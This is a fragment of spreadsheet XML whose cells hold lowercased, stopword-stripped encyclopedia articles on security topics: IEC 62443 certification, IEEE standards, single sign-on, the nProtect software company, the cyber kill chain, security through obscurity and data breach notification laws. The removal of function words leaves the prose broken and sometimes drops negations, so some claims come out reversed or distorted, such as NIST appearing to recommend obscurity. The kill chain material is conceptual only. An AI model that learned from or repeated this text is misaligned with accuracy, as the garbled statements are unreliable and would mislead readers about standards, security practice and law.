saar, nord, rheinland, global infrastructure national accreditation bodies (ab) ensures consistent evaluation 62443. operate requirements iso/iec 17011, standard contains requirements competence, consistency, impartiality accreditation bodies accrediting conformity assessment bodies. members work management systems, products, services, personnel accreditation ilac laboratory accreditation. multilateral recognition arrangement (mla) ensure global recognition accredited cbs. companies accredited provide inspection according iso/iec 17020, testing laboratories according iso/iec 17025 certification products, processes, services according iso/iec 17065. iecee scheme system conformity assessment schemes electrotechnical equipment components (iecee) certification body scheme scheme) multilateral agreement facilitates market access manufacturers electrical electronic products. under scheme processes, products systems certified according 62443. origin scheme comes (former european "commission conformity testing electrical equipment") integrated 1985. currently, member bodies iecee, ncbs (national certification bodies), test laboratories (cbtl). field product certification, procedure used reduce complexity approval procedure manufacturers products tested certified according harmonized standards. product tested cbtl (certified testing laboratory) according harmonized standard 62443, report basis later national certification approval pse, ccc, nom, gost/r, bsmi. isci isasecure security compliance institute (isci), subsidiary isa, created proprietary conformity assessment scheme aligned 62443 standards. this scheme used certify industrial automation control systems, components processes. companies certifying isasecure certification scheme accredited isasecure technical readiness requirements test laboratories certification body accredited 17025 17065 standards, respectively. isci offers multiple certifications isasecure brand: (system security assurance) certification systems according 62443-3-3 62443-4-1 (component security assurance) certification automation components according 62443-4-1 62443-4-2 sdla (secure development lifecycle assurance) certification automation systems development organizations according 62443-4-1 edsa (embedded device security assurance) certification components based 62443-4-2. this certification offered 2010 phased 62443-4-2 standard formally approved published 2018. also cybersecurity standards functional safety international electrotechnical commission references external links website iecee website</t>
  </si>
  <si>
    <t>IEEE 1680</t>
  </si>
  <si>
    <t>ieee 1680 family ieee sustainability standards dealing assessment environmental performance electronic products.ieee 1680 facto standard green computing desktop level.as april 2020, 1680 family standards consists 1680.1 standard environmental social responsibility assessment computers, tablets monitors. 1680.2 standard environmental assessment imaging equipment (printers, copiers, scanners, machines, multifunction devices...). 1680.3 standard environmental assessment televisions.the 1680.4 standard servers 1680.6 standard complex boxes development 1680.4 failed ballot superseded 426. 1680.6 never passed ballot archived. references https://global.ihs.com/doc_detail.cfm?document_name=nsf%20426&amp;item_s_key=00728331 external links official ieee webpage ieee 1680 family standards (discontinued) official ieee webpage ieee 1680.1-2018 standard official ieee webpage ieee 1680.2-2012 standard official ieee webpage ieee 1680.3-2012 standard</t>
  </si>
  <si>
    <t>IEEE 802.10</t>
  </si>
  <si>
    <t>ieee 802.10 former standard security functions could used local area networks metropolitan area networks based ieee protocols. 802.10 specifies security association management management, well access control, data confidentiality data integrity. ieee 802.10 standards withdrawn january 2004 working group ieee currently active. security wireless networks standardized 802.11i. cisco inter-switch link (isl) protocol supporting vlans ethernet similar technologies based ieee 802.10; application 802.10 largely replaced ieee 802.1q. standard developed parts: model, including security management secure data exchange (sde) protocol management incorporated over ethernet sublayer management security labels pics conformance.parts incorporated ieee standard 802.10-1998. external links ieee 802.10-1998</t>
  </si>
  <si>
    <t>IEEE Transactions on Information Theory</t>
  </si>
  <si>
    <t>ieee transactions information theory monthly peer-reviewed scientific journal published ieee information theory society. covers information theory mathematics communications. established 1953 transactions information theory. editor-in-chief muriel médard (massachusetts institute technology). 2007, journal allows posting preprints arxiv.according jack lint, leading research journal whole field coding theory. 2006 study using pagerank network analysis algorithm found that, among hundreds computer science-related journals, ieee transactions information theory highest ranking thus deemed prestigious. computing surveys, highest impact factor, deemed popular. references tver external links official website list past editors-in-chief</t>
  </si>
  <si>
    <t>IEEEXtreme</t>
  </si>
  <si>
    <t>ieeextreme (often abbreviated xtreme) annual hackathon competitive programming challenge teams ieee student members, often supported ieee student branch proctored ieee member, compete 24-hour time span solve programming problems. competition underwritten coordinated ieee's membership geographic activities department, often supported partnering sponsors, like ieee computer society. history ieeextreme created 2006 marko delimar ricardo varela who, time, ieee student activities committee. first instance ieeextreme held 2006 global participation teams contestants. numbers tripled second time held, 2008, teams participants. iteration ieeextreme 2015, enjoyed registration 2,300 teams, participation 1,900 teams, 5,500+ student competitors, 600+ proctors, 100+ volunteers around world. competition rules teams three student ieee members receive sets programming problems hours, starting 0:00 competition date. teams receive problems solve expected solve problems without direct outside consultation. teams don’t need tackle every problem, solve, points score. students submit solutions using online tool, hackerrank recent years. points awarded based problem solved, time took, difficulty. higher-grade ieee members serve judges proctors competition. competition free, ieee student membership required participate. students undergraduate graduate welcome register ieee student members participants ieeextreme day. cost ieee student membership varies country country. yearly results ieeextreme 12.0 (2018) ieeextreme 12.0 held october 2018. ieeextreme 11.0 (2017) ieeextreme 11.0 held october 2017. ieeextreme 10.0 (2016) ieeextreme 10.0 held october 2016. ieeextreme (2015) ieeextreme held october 2015. ieeextreme (2014) ieeextreme held october 2014. ieeextreme (2013) ieeextreme held october 2013. ieeextreme (2009) ieeextreme held october 2009. also competitive programming, type mind sport involved programming competitions references</t>
  </si>
  <si>
    <t>IEEEmadC</t>
  </si>
  <si>
    <t>ieeemadc (mobile applications development contest) international contest organized volunteers ieee student members across globe. main goal educate encourage students pursue future career mobile application developers, develop engineering, social team skills consequently become competitive labor market. contest organized online three phases: education idea, development judging stage. teams three ieee student members invited devise develop mobile applications. develop mobile prizes criteria judged: design, user experience, usefulness, availability, number supported platforms open source support. history ieeemadc started fall 2013 university j.j.strossmayer student branch osijek, croatia. contest founded josip balen, luka horvat igor bedek support ieee student activities committee. first iteration contest ieee students europe, africa middle east (region second iteration contest organized worldwide ieee student members ieee regions. ieeemadc enjoying year competition 2016. received honours contest stages education stage main goals educational stage educate encourage students become (mobile application developers), develop engineering, social team skills consequently become competitive labor market. during stage ieeemadc ambassadors experts industry organize webinars mobile application development. furthermore, help university professors organizing technical workshops lectures local ieee sections, universities ieee student branches around globe. idea stage stage students able register submitting ideas mobile applications would like develop. ideas evaluated within days submission accepted, participants start application development.apply now. development stage teams whose ideas approved eligible submit apps necessary attachments: screenshots working application (minimum link short video showing features application (between 30-120 sec.) application installation files (.apk, .ipa, .xap...) short (450 words max.) description usefulness technical approach tools used developing application link online repository(s) application code published online) external links ieeemadc website references</t>
  </si>
  <si>
    <t>IF-MAP</t>
  </si>
  <si>
    <t>interface metadata access points (if-map) open specification client/server protocol developed trusted computing group (tcg) core protocols trusted network connect (tnc) open architecture. if-map provides common interface metadata access point (map), database server acting clearinghouse information security events objects, elements architecture.[1] if-map protocol defines publish/subscribe/search mechanism identifiers data types. history if-map protocol first published april 2008. originally, if-map specification developed support data sharing across various vendor’s devices applications network security. specification also adopted additional cases data-sharing including physical security.the version if-map spec separated base protocol metadata definitions define different types information represented. goal separating base protocol metadata definitions within specification allow specification adopted across technologies (such cloud computing, industrial control systems, smart grid) leverage existing data models within framework.version if-map spec published 2012. primary feature if-map if-map identifier space became extensible.a reference implementation available gplv3 license google code repository. references lawton, george. “new protocol improves interaction among networked devices applications”, “computing now”, ieee computer society. reed, brad. “nac group expands scope”, “network world magazine”, publishing. beliles, robert. “technology securing “seat” executive table”, “security magazine”, media. “if-map based intercloud testbed planning” “securing scada control networks” messmer, ellen. “trusted computing group eyes cloud security framework”, “network world magazine”, publishing. external links if-map resources trusted computing group omapd opensource if-map server google code</t>
  </si>
  <si>
    <t>Signed and Encrypted Email Over The Internet</t>
  </si>
  <si>
    <t>signed encrypted email over internet (seeoti) initiative approach providing small medium enterprises ability communicate securely another, government defence ministries major aerospace defence contractors, allowing play full part defence supply chain. overview seeoti implements secure email specifications defined transglobal secure collaboration program (tscp). these support interoperable signing encryption email messages federated environment. addition, security labelling email messages supported network border guard able check labels even though messages encrypted. this meets goal protecting intellectual property global business environment, particular importance cyber security strategy intellectual property seen growth economy.deep-secure organised trial seeoti council electronic business. this integrated commercial shelf (cots) products titus, boldon james deep-secure provide system's email security functionality. deep-secure selected overall winner ukceb excellence awards 2011 work seeoti february 2012. deep-secure partners adept4, intercede trustis providing seeoti solution service. nexor provide compatible products. references</t>
  </si>
  <si>
    <t>Sign-on server</t>
  </si>
  <si>
    <t>single sign-on (sso) authentication scheme allows user single several related, independent, software systems. true single sign-on allows user access services without re-entering authentication factors. confused same-sign (directory server authentication), often accomplished using lightweight directory access protocol (ldap) stored ldap databases (directory) servers.a simple version single sign-on achieved networks using cookies sites share common parent domain.for clarity, distinction made directory server authentication (same-sign single sign-on: directory server authentication refers systems requiring authentication application using credentials directory server, whereas single sign-on refers systems single authentication provides access multiple applications passing authentication token seamlessly configured applications. conversely, single sign-off single log-out (slo) property whereby single action signing terminates access multiple software systems. different applications resources support different authentication mechanisms, single sign-on must internally store credentials used initial authentication translate credentials required different mechanisms. other shared authentication schemes, openid openid connect, offer services require users make choices sign-on resource, configured single sign-on services (such user consent) disabled. increasing number federated social logons, like facebook connect, require user enter consent choices upon first registration resource, always single sign-on strictest sense. benefits benefits using single sign-on include: mitigate risk access 3rd-party sites ("federated authentication") user passwords stored managed externally reduce password fatigue different username password combinations reduce time spent re-entering passwords identity reduce costs lower number help desk calls passwords simpler administration. sso-related tasks performed transparently part normal maintenance, using tools used administrative tasks. better administrative control. network management information stored single repository. this means single, authoritative listing user’s rights privileges. this allows administrator change user’s privileges know results propagate network wide. improved user productivity. users longer bogged multiple logons, required remember multiple passwords order access network resources. this also benefit help desk personnel, need field fewer requests forgotten passwords. better network security. eliminating multiple passwords also reduces common source security breaches—users writing passwords. finally, consolidation network management information, administrator know certainty disables user’s account, account fully disabled. consolidation heterogeneous networks. joining disparate networks, administrative efforts consolidated, ensuring administrative best practices corporate security policies consistently enforced.sso shares centralized authentication servers applications systems authentication purposes combines techniques ensure users actively enter credentials once. criticism term reduced sign-on (rso) used reflect fact single sign-on impractical addressing need different levels secure access enterprise, authentication server necessary.as single sign-on provides access many resources user initially authenticated ("keys castle"), increases negative impact case credentials available people misused. therefore, single sign-on requires increased focus protection user credentials, ideally combined strong authentication methods like smart cards one-time password tokens.single sign-on also makes authentication systems highly critical; loss availability result denial access systems unified sso. configured session failover capabilities order maintain system operation. nonetheless, risk system failure make single sign-on undesirable systems access must guaranteed times, security plant-floor systems. furthermore, single-sign-on techniques utilizing social networking services facebook render third party websites unusable within libraries, schools, workplaces block social media sites productivity reasons. also cause difficulties countries active censorship regimes, china "golden shield project," third party website actively censored, effectively blocked user's social login blocked. security march, 2012, research paper reported extensive study security social login mechanisms. authors found serious logic flaws high-profile providers relying party websites, openid (including google paypal access), facebook, janrain, freelancer, farmville, sears.com. because researchers informed providers relying party websites prior public announcement discovery flaws, vulnerabilities corrected, security breaches reported.in 2014, vulnerability named covert redirect disclosed. first reported "covert redirect vulnerability related oauth openid" discoverer wang jing, mathematical student nanyang technological university, singapore. fact, almost single sign-on protocols affected. covert redirect takes advantage third-party clients susceptible open redirect.in december 2020, flaws federated authentication systems discovered utilized attackers 2020 united states federal government data breach.due single sign-on works, sending request logged-in website token sending request token logged-out website, token cannot protected httponly cookie flag thus stolen attacker vulnerability logged-out website, order session hijacking. another security issue session used stolen (which protected httponly cookie flag unlike token), attacker access websites using system. privacy originally implemented kerberos saml, single sign-on give users choices releasing personal information resource user visited. this worked well enough within single enterprise, like kerberos invented, major corporations resources internal sites. however, federated services like active directory federation services proliferated, user's private information sent affiliated sites control enterprise collected data user. since privacy regulations tightening legislation like gdpr, newer methods like openid connect started become attractive; example mit, originator kerberos, supports openid connect. email address single sign-on theory work without revealing identifying information email addresses relying party (credential consumer), many credential providers allow users configure information passed credential consumer. 2019, google facebook sign-in require users share email addresses credential consumer. 'sign apple' introduced allows user request unique relay email address time user signs service, thus reducing likelihood account linking credential consumer. common configurations kerberos-based initial sign-on prompts user credentials, gets kerberos ticket-granting ticket (tgt). additional software applications requiring authentication, email clients, wikis, revision-control systems, ticket-granting ticket acquire service tickets, proving user's identity mail-server wiki server etc. without prompting user re-enter credentials.windows environment windows login fetches tgt. active directory-aware applications fetch service tickets, user prompted re-authenticate. unix/linux environment login kerberos modules fetches tgt. kerberized client applications evolution, firefox, service tickets, user prompted re-authenticate. smart-card-based initial sign-on prompts user smart card. additional software applications also smart card, without prompting user re-enter credentials. smart-card-based single sign-on either certificates passwords stored smart card. integrated windows authentication integrated windows authentication term associated microsoft products refers spnego, kerberos, ntlmssp authentication protocols respect sspi functionality introduced microsoft windows 2000 included later windows nt-based operating systems. term commonly used refer automatically authenticated connections microsoft internet information services internet explorer. cross-platform active directory integration vendors extended integrated windows authentication paradigm unix (including mac) linux systems. security assertion markup language security assertion markup language (saml) xml-based method exchanging user security information saml identity provider saml service provider. saml supports encryption service-provider–initiated browser single sign-on exchanges. user wielding user agent (usually browser) called subject saml-based single sign-on. user requests resource protected saml service provider. service provider, wishing know identity user, issues authentication request saml identity provider user agent. identity provider provides user credentials. service provider trusts user information identity provider provide access services resources. emerging configurations mobile devices access credentials newer variation single-sign-on authentication developed using mobile devices access credentials. users' mobile devices used automatically onto multiple systems, building-access-control systems computer systems, authentication methods include openid connect saml, conjunction x.509 itu-t cryptography certificate used identify mobile device access server. mobile device "something have," opposed password "something know," biometrics (fingerprint, retinal scan, facial recognition, etc.) "something are." security experts recommend using least three factors (multi-factor authentication) best protection. also account pre-hijacking central authentication service identity management identity management systems list single sign-on implementations password manager security assertion markup language usability authentication systems references external links single sign-on intro diagrams</t>
  </si>
  <si>
    <t>INCA Internet</t>
  </si>
  <si>
    <t>inca internet corporation (korean: 잉카인터넷), also known nprotect, corporation sells computer software. inca internet founded young heum joo, current president inca internet, 2000. offers anti-virus, anti-spyware, game security, unified corporate security. headquartered seoul, republic korea, inca internet selected deloitte technology fast korea 2007 deloitte technology fast asia pacific 2007. company overview inca internet information security company based republic korea, develops 'nprotect' line computer security products. young heum founded company january 2000, currently president. company currently holds market share information security korean financial institutions game portal security. public company limited shares, young largest stockholder, followed jaic japan meespierson netherlands. other major investors include jaic, japan's largest independent venture capital firm, (korea development bank). main business areas inca internet include online security services financial institutions, internet business corporations, online game corporations among others, online game security solutions, united security solution corporate internal security business online anti-virus normal internet users. inca internet first application service provider (asp) companies online security industry. products widely used korean japanese financial institutions, public institutions, worldwide on-line game companies. inca internet awarded ir52 jang yeong-sil award, regarded highest reputable award korean industrial technology field. acquired 9000 certificate tuvit, certification institution affiliated german rwtuv group. inca internet information security company south korea included deloitte technology fast500 asia pacific 2007. inca internet currently client companies countries total million users countries. history inca internet first entered market january 2000, acquired global patent 'nprotect netizen' first program provide real-time client information security service. inca internet developed strong corporation independent technology leading korean japanese security market financial electronic commerce industry. since december 2005, inca internet located within guro digital complex, largest industrial complex south korea played pivotal role economic growth korea, referred "miracle han" contributing national exports 1970s. futuristic industrial hub, centering research development, advanced information, technology, knowledge industries. relocation great synergy effect inca internet many corporations located benefited information sharing partnerships. markets inca internet nprotect products apply saas (software service) model. first company security industry provide internet banking security online since spread saas model security security. company currently holds market share information security korean financial institutions game portal security. internationally, inca internet mainly provides security solutions china, japan, south-east asia, europe. companies card, ufj, tokyo star bank among corporations using inca internet's protection. products nprotect gameguard online game security system provides game security online game companies portal sites form b2b2c provide security games game users (from hacking, cracking, user account information stealing, system viruses cyber crimes) bundled many multiplayer online games aion: tower eternity, phantasy star universe, maplestory, gunbound, gunz: duel, sudden attack, flyff, ragnarok online 9dragons hides game application process, monitors entire memory range, terminates applications defined game vendor inca cheats, blocks certain calls directx functions windows apis auto-updates change threats surface. gameguard subject controversy program rootkit installed without user authorization client machine. nprotect netizen, nprotect personal, nprotect keycrypt based security provides protection internet banking, electronic commerce online transactions 24-hour stabilization service provides customization clients many business models possible b2b2c, b2c, according customer client preferences goals nprotect anti-virus/spyware, nprotect gameguard personal 2007 anti-virus solution provides end-user clients real-time protection viruses, spyware, hacking tools malware gameguard personal product contains optimization, game account protection, game mode features game users file management feature file encryption/decryption secure deletion nprotect enterprise unified solution provides protection corporations, public institutions, research facilities educational institutions form based firewall technology provides unified security solution corporate users, provides unified administrator features security managers electronic managers within organization. prevention information leakage sensitive confidential information information asset security. nprotect webscan security provides security inspecting security vulnerabilities applications providing services providing detailed descriptions solutions vulnerabilities. inspects recommended security inspections owasp inspects new, popular attacks vulnerabilities server service. provides fast inspection multi-thread inspection also provides simulated hacking tool used simulate security breach security vulnerabilities found provide better understanding vulnerability. criticism their programs widely used korean internet environment; depend activex microsoft windows. internet banks korea need programs law, users using linux, browsers operating systems besides internet explorer microsoft windows access online banks.most functions kernel level versions windows user account control (windows vista, windows higher.) unable smoothly. moreover, program crash kernel windows system input devices especially keyboard, conjunction nprotect caused reason. nprotect netizen, nprotect personal nprotect keycrypt programs used mostly internet banking korea. they programmed terminate processes associated banking, processes terminated indiscriminately deemed threat thus compromise system's stability. these programs also inject existing processes startup, sometimes collide anti-viruses. more problematically, korean banks update program every time inca releases update. also nprotect gameguard anti-virus software notes references</t>
  </si>
  <si>
    <t>INDICARE</t>
  </si>
  <si>
    <t>goal overall goal indicare (the informed dialogue consumer acceptability solutions europe) help reconcile heterogeneous interests multiple stakeholders, support emergence common european position regard consumer user issues digital rights management (drm) solutions. econtent indicare responded call, subline 3.3: management rights digital content, econtent programme european commission, information society. indicare, so-called accompanying measure, initiated march 2004 scheduled years (ref.: 53042 indicare 28609). econtent replaced econtentplus march 2005. focus indicare addresses problems pointed econtent work programme 2003–2004: “there little attention consumer side managing rights. questions remain open level consumer acceptability rights management solutions. interface functionality systems, well policy issues linked privacy access information investigated. consumer question also involves easiness access, legitimate content business models easiness access disabled persons” 19). addition consumer issues, indicare addresses user side, particular concerns creators small medium-sized information providers. approach indicare project establishes maintains informed dialogue consumer user issues drm. informed dialogue means discussions stimulated informed good quality input news information profound analyses (see below). part input derived interdisciplinary in-depth research indicare partners well knowledge experts stakeholders co-operating indicare. external links indicare website publications econtent work programme 2003–2004 econtentplus project consortium institute technology assessment systems analysis (itas), karlsruhe, germany (project initiator co-ordinator) institute information (ivir), university amsterdam, netherlands department measurement information systems, budapest university technology economics, hungary berlecon research gmbh, berlin, germany</t>
  </si>
  <si>
    <t>Sigma (signature format)</t>
  </si>
  <si>
    <t>sigma signature format based pattern matching system logging, detect malicious behavior computer systems. also yara snort further reading kont, markus. "ids logs: towards implementing streaming sigma rule engine" (pdf). cooperative cyber defence centre excellence. references external links github repository sigmatools pypi</t>
  </si>
  <si>
    <t>INOC-DBA</t>
  </si>
  <si>
    <t>inoc-dba (inter-network operations center dial-by-asn) hotline phone system global voice telephony network connects network operations centers security incident response teams critical internet infrastructure providers backbone carriers, internet service providers, internet exchanges well critical individuals within policy, regulatory, internet governance, security vendor communities. built packet clearing house 2001, publicly announced nanog october 2002, secretariat function transferred brazilian cert 2015.inoc-dba closed system, ensuring secure authenticated communications, uses combination redundant directory services direct peer-to-peer communications stations create resilient, high-survivability network. carries routine operational traffic emergency-response traffic. inoc-dba network uses ietf-standard voice protocols ensure interoperability thousands users across 2,800 nocs certs, dozens different varieties station switch devices. first production implementation inter-carrier telephony, voice previously consisted exclusively h.323 gateway-to-gateway call transport. inoc-dba became first telephone network kind provide service seven continents michael holstine raytheon polar services installed terminals south pole station march 2001. references external links inoc-dba directory. directory subset inoc-dba participants choose publicly listed. sobre inoc-dba. portuguese introduction inoc-dba system, maintained nic-br, brazilian national internet registry. inoc-dba technical discussion mailing list archives inoc-dba announcement presentation format inoc-dba announcement demonstration quicktime format "inoc-dba initial press release". october 2002. archived original december 2002. initial press release describing inoc-dba system upon debut. nanog update gaurab upadhaya</t>
  </si>
  <si>
    <t>Shunra</t>
  </si>
  <si>
    <t>shunra software, privately held company provided network virtualization solutions software testing. march 2014, announced signed definitive agreement acquire network virtualization business technology shunra, partner. history founded israel 1998, company received investment insight venture partners carmel ventures 2004 moved headquarters philadelphia 2006. 2010, gary jackson appointed ceo. 2013, shunra announced open integration platform mobile performance. part launch, partnership formed hewlett-packard (hp), jamo, capgemini, soasta, keynote deviceanywhere. october 2012, company signed global distribution agreement placed shunra's products commercial price list.on march 2014, announced signed definitive agreement acquire network virtualization business technology shunra. april 2014, acquired network virtualization business technology shunra. references</t>
  </si>
  <si>
    <t>Kill chain</t>
  </si>
  <si>
    <t>term kill chain military concept identifies structure attack. consists identification target dispatching forces target initiation attack target destruction targetconversely, idea "breaking" opponent's kill chain method defense preemptive action. military f2t2ea military kill chain model "f2t2ea", includes following phases: find: identify target. find target within surveillance reconnaissance data intelligence means. fix: target's location. obtain specific coordinates target either existing data collecting additional data. track: monitor target's movement. keep track target either decision made engage target target successfully engaged. target: select appropriate weapon asset target create desired effects. apply command control capabilities assess value target availability appropriate weapons engage engage: apply weapon target. assess: evaluate effects attack, including intelligence gathered location.this integrated, end-to-end process described "chain" interruption stage interrupt entire process. previous terminology "four military term used united states military, especially world designed easy remember, "four follows: find enemy locate enemy. enemy suppressing fire. fight enemy engage enemy combat flank enemy send soldiers enemy's sides rear. finish enemy eliminate enemy combatants. proposed terminology "five military term described maj. mike "pako" benitez, f-15e strike eagle weapons systems officer served united states force united states marine corps. designed update kill chain reflect updated, autonomous semi-autonomous weapon systems, "five described "it's about time: pressing need evolve kill chain" follows: find encapsulates unity effort joint intelligence preparation operating environment, matching collection assets commander's intent targeted areas interest. this inevitably leads detections, classified emerging target meets intent. doctrinally described "identifying emerging target worthy engagement determines position data sufficient fidelity permit engagement." fire involves committing forces resources (i.e., releasing munition, payload, expendable) finish involves employment strike approval authorities (i.e., striking target/firing directed energy/destructive electronic attack). this similar ground element executing maneuvers contact adhering prescribed rules engagement arriving point friction. feedback closes operational ooda loop evaluative step, circumstances referred "bomb damage assessment". north korean nuclear capability american military contingency plan called "kill chain" reportedly first step strategy satellite imagery identify north korean launch sites, nuclear facilities manufacturing capability destroy pre-emptively conflict seems imminent. plan mentioned joint statement united states south korea. cyber attack phases countermeasures more recently, lockheed martin adapted concept information security, using method modeling intrusions computer network. cyber kill chain model seen adoption information security community. however, acceptance universal, critics pointing believe fundamental flaws model.computer scientists lockheed-martin corporation described "intrusion kill chain" framework model defend computer networks 2011. they wrote attacks occur phases disrupted controls established phase. since then, "cyber kill chain" adopted data security organizations define phases cyberattacks.a cyber kill chain reveals phases cyberattack: early reconnaissance goal data exfiltration. kill chain also used management tool help continuously improve network defense. according lockheed martin, threats must progress several phases model, including: reconnaissance: intruder selects target, researches attempts identify vulnerabilities target network. weaponization: intruder creates remote access malware weapon, virus worm, tailored vulnerabilities. delivery: intruder transmits weapon target (e.g., e-mail attachments, websites drives) exploitation: malware weapon's program code triggers, takes action target network exploit vulnerability. installation: malware weapon installs access point (e.g., "backdoor") usable intruder. command control: malware enables intruder "hands keyboard" persistent access target network. actions objective: intruder takes action achieve goals, data exfiltration, data destruction, encryption ransom.defensive courses action taken phases: detect: determine whether intruder present. deny: prevent information disclosure unauthorized access. disrupt: stop change outbound traffic attacker). degrade: counter-attack command control. deceive: interfere command control. contain: network segmentation changesa u.s. senate investigation 2013 target corporation data breach included analysis based lockheed-martin kill chain framework. identified several stages controls prevent detect progression attack. alternatives different organizations constructed kill chains model different threats. fireeye proposes linear model similar lockheed-martin's. fireeye's kill chain persistence threats emphasized. this model stresses threat cycle. reconnaissance initial intrusion network establish backdoor network. obtain user credentials. install various utilities. privilege escalation/ lateral movement/ data exfiltration maintain persistence. critiques among critiques lockheed martin's cyber kill chain model threat assessment prevention tool first phases happen outside defended network, making difficult identify defend actions phases. similarly, methodology said reinforce traditional perimeter-based malware-prevention based defensive strategies. others noted traditional cyber kill chain suitable model insider threat. this particularly troublesome given likelihood successful attacks breach internal network perimeter, organizations "need develop strategy dealing attackers inside firewall. they need think every attacker potential insider". unified kill chain unified kill chain developed 2017 paul pols collaboration fox-it leiden university overcome common critiques traditional cyber kill chain, uniting extending lockheed martin's kill chain mitre's att&amp;ck framework. unified version kill chain ordered arrangement unique attack phases occur end-to-end cyberattack, covers activities occur outside within defended network. such, unified kill chain improves scope limitations traditional kill chain time-agnostic nature tactics mitre's att&amp;ck. unified model used analyze, compare, defend end-to-end cyber attacks advanced persistent threats (apts). subsequent whitepaper unified kill chain published 2021. references</t>
  </si>
  <si>
    <t>Security through obscurity</t>
  </si>
  <si>
    <t>security obscurity security obscurity) reliance security engineering design implementation secrecy main method providing security system component. history early opponent security obscurity locksmith alfred charles hobbs, 1851 demonstrated public state-of-the-art locks could picked. response concerns exposing security flaws design locks could make vulnerable criminals, said: "rogues keen profession, know already much teach them."there scant formal literature issue security obscurity. books security engineering cite kerckhoffs' doctrine 1883, cite anything all. example, discussion secrecy openness nuclear command control: [t]he benefits reducing likelihood accidental considered outweigh possible benefits secrecy. this modern reincarnation kerckhoffs' doctrine, first forward nineteenth century, security system depend key, design remaining obscure. field legal academia, peter swire written trade-off notion "security obscurity illusion" military notion "loose lips sink ships" well competition affects incentives disclose.there conflicting stories origin term. fans mit's incompatible timesharing system (its) coined opposition multics users hall, security issue its. within culture term referred, self-mockingly, poor coverage documentation obscurity many commands, attitude time tourist figured make trouble he'd generally urge make felt part community. instance deliberate security obscurity noted: command allow patching running system (altmode altmode control-r) echoed $$^d. typing control-d flag would prevent patching system even user later right.in january 2020, reported democratic party officials iowa declined share information regarding security caucus app, "make sure relaying information could used us." cybersecurity experts replied withhold technical details much protect system." criticism security obscurity alone discouraged recommended standards bodies. national institute standards technology (nist) united states sometimes recommends practice: "system security depend secrecy implementation components."the technique stands contrast security design open security, although many real-world projects include elements strategies. obscurity architecture technique knowledge system built differs concealment camouflage. effectiveness obscurity operations security depends whether obscurity lives good security practices, used alone. when used independent layer, obscurity considered valid security tool.in recent years, security obscurity gained support methodology cybersecurity moving target defense cyber deception. nist's cyber resiliency framework, 800-160 volume recommends usage security obscurity complementary part resilient secure computing environment. also references external links eric raymond cisco's source code 'release' open source computer security publications: information economics, shifting liability first amendment ethan preston john lofton "security through obscurity" ain't what they think wayback machine (archived february 2007) beale secrecy, security obscurity non-security secrecy bruce schneier "security obsolescence", robin miller, linux.com, june 2002</t>
  </si>
  <si>
    <t>Security breach notification laws</t>
  </si>
  <si>
    <t>security breach notification laws data breach notification laws laws require individuals entities affected data breach, unauthorized access data, notify customers parties breach, well take specific steps remedy situation based state legislature. data breach notification laws main goals. first goal allow individuals chance mitigate risks data breaches. second goal promote company incentive strengthen data security.together, goals work minimize consumer harm data breaches, including impersonation, fraud, identity theft.such laws irregularly enacted u.s. states since 2002. currently, states enacted forms data breach notification laws. noted though, federal data breach notification law, despite previous legislative attempts. these laws enacted response escalating number breaches consumer databases containing personally identifiable information. similarly, multiple countries, like european unions's general data protection regulation (gdpr) australia's privacy amendment (notifiable data breaches) 2017 (cth), added data breach notification laws combat increasing occurrences data breaches.the rise data breaches conducted countries individuals evident alarming, number reported data breaches increased 2011, 1,091 2016, 1,579 2017 according identity theft resource center (itrc). also impacted millions people gained increasing public awareness large data breaches october 2017 equifax breach exposed almost million individual's personal information. australia february 2018, australia passed privacy amendment (notifiable data breaches) 2017 (cth), went action 2018. this amended privacy 1988 (cth), established notification system data breaches involving personal information lead harm. now, entities existing personal information security obligations australian privacy required notify office australian information commissioner (oaic) affected individuals “eligible data breaches.” amendment coming large data breaches experiences australia, yahoo hack 2013 involving thousands government officials data breach australian cross releasing 550,000 blood donor's personal information. criticism data breach notification include: unjustified exemption certain entities small businesses privacy commissioner required post data breaches permanent place used data future research. addition, notification obligations consistent state level. china mid-2017, china adopted cyber security law, included data breach notification requirements. european union 1995, passed data protection directive (dpd), recently replaced 2016 general data protection regulation (gdpr), comprehensive federal data breach notification law. gdpr offers stronger data protection laws, broader data breach notification laws, factors right data portability. however, certain areas data breach notification laws supplemented data security laws.examples include, european union implemented breach notification directive privacy electronic communications (e-privacy directive) 2009, specific personal data held telecoms internet service providers. this contains notification obligations data breaches.the traffic data subscribers, voice data network company, saved company operational reasons. however, traffic data must deleted aren’t necessary anymore, order avoid breaches. however, traffic data necessary creation treatment subscriber billing. data available period bill repaid based european union (article paragraphs regarding marketing usage traffic data sale additional chargeable services, used company subscriber gives his/her consent (but, consent withdrawn every time). also, service provider must inform subscriber user types traffic data processed duration based assumptions. processing traffic data, accordance details, must restricted persons acting authority providers public communications networks publicly available electronic communications services handling billing traffic management, customer enquiries, fraud detection, marketing electronic communications services providing value added service, must restricted necessary purposes activities. data breach notification obligations included directive security network information systems (nis directive). this creates notification requirements essential services digital service providers. among include immediately notifying authorities computer security incident response teams (csirts) experience significant data breach. similar concerns state-by-state approach creating increased costs difficulty complying state laws, eu's various breach notification requirements different laws creates concern. japan 2015, japan amended protection personal information (appi) combat massive data leaks. specifically, massive benesse corporation data leak 2014 nearly million pieces private customer information leaked sold. this includes penal sanctions illegal transaction, however, specific provision dealing data breach notification appi. instead, policies concerning protection personal information, accordance appi, creates policy encourages business operators disclose data breaches voluntarily.kaori ishii taro komukai theorized japanese culture offers potential explanation specific data breach notification encourage companies strengthen data security. japanese general public mass media, particularly, condemn leaks. consequently, data leaks quickly result losing customer trust, brand value, ultimately profits. example include, 2004 data leak, softbank swiftly lost billion benesse corporation lost 940,000 customers data leak. this resulted compliance disclosing data leaks accordance policy.while proving japanese culture makes specific data breach notification laws necessary difficult objectively prove, shown companies experience data breach experience financial reputation harm. zealand zealand’s privacy 2020 came force december 2020, replacing 1993 act. makes notification privacy breaches mandatory. organisations receiving collecting data report privacy breach believe caused, likely cause, serious harm. united states data breach notification laws enacted states, district columbia, guam, puerto rico virgin islands. august 2021, attempts pass federal data breach notification unsuccessful. states first law, california data security breach notification law, enacted 2002 became effective july 2003. bill enacted reaction fear identity theft fraud. related bill statement, requires state agency, person business conducts business california, owns licenses computerized data includes personal information, defined, disclose specified ways, breach security data, defined, resident california whose unencrypted personal information was, reasonably believed been, acquired unauthorized person." addition, permits delayed notification enforcement agency determines would impede criminal investigation." also requires entity licenses information notify owner licensee information breach security data. general, state laws follow basic tenets california's original law: companies must immediately disclose data breach customers, usually writing. california since broadened include compromised medical health insurance information. where bills differ level breach must reported state attorney general (usually affects 1000 individuals more). some states like california publish data breach notifications oag.gov websites. breaches must reported "sensitive 